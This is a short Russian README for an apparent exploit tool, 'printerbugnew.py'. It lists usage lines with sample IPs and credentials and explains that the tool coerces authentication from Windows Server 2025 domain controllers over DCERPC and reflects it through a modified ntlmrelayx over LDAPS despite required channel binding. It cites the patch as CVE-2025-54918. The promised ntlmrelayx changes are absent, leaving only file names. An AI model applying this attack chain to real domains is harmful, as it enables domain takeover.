
Версия printerbug.py только для DCERPC
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Этот эксплойт через отражение работает только на W2025 с «новым» printerbug (DCERPC вместо Named Pipes).
Вам потребуется изменить ntlmrelayx в нескольких местах, чтобы он заработал. После этого вы сможете удаленно вызвать ошибку принтера на контроллере домена W2025 и отразить аутентификацию через LDAPS(!), даже если Channel Bindings ТРЕБУЕТСЯ
ldaprelayclient.py:

rpcrelayserver.py
и релей ;)

Уязвимость была исправлена в Patch Tuesday сентября 2025: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
Исправление гарантирует, что MIC всегда вычисляется, даже если сообщение Type 3 пусто.
Спасибо автору этого CVE за ценный совет :)